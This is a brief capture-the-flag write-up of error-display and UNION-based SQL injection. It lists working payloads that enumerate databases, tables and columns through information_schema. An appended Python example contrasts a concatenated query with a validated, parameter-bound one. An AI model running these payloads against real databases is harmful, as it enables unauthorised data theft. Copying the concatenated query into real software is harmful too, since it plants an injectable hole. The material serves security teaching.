Pass-01

Topic: error-display injection combined with a UNION query

select * from user where id=1

id=1 and 1=1          the page returns the record

and 1=2          the page returns an error

id=1 and 1=2 union select 1,2,3          columns 2 and 3 are echoed back

Dump the database names

id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata

Dump the table names

id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='error'

Dump the column names

id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='error_flag'

Get the flag
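Why the UNION payload from this pass works, and the fix, as an added example that is not part of the original write-up: the query is built by string concatenation, so the input becomes SQL. It assumes a constructed three-column `user` table in an in-memory SQLite database; the function names are hypothetical.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the challenge's three-column table (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, name TEXT, bio TEXT)")
    db.execute("INSERT INTO user VALUES (1, 'alice', 'hello')")
    return db


def lookup_vulnerable(db, raw_id):
    # The pattern behind this pass: the id parameter is pasted into the SQL
    # text, so "and 1=2 union select ..." is parsed as part of the statement.
    return db.execute("select * from user where id=" + raw_id).fetchall()


def lookup_hardened(db, raw_id):
    # 1. Validate: the id must be a plain ASCII decimal number.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    # 2. Bind: the value travels separately from the SQL text, so it can
    #    never change the structure of the statement.
    return db.execute("select * from user where id=?", (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1 and 1=2 union select 1,2,3"  # payload quoted from the write-up
    print("vulnerable, id=1    :", lookup_vulnerable(db, "1"))
    print("vulnerable, payload :", lookup_vulnerable(db, payload))
    print("hardened,   id=1    :", lookup_hardened(db, "1"))
    try:
        lookup_hardened(db, payload)
    except ValueError as exc:
        print("hardened,   payload : rejected,", exc)
```

Returning a generic error page instead of the database error message also removes the feedback channel that the `and 1=1` / `and 1=2` probes rely on.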

Original article: https://www.cnblogs.com/xiaobai141/p/14131919.html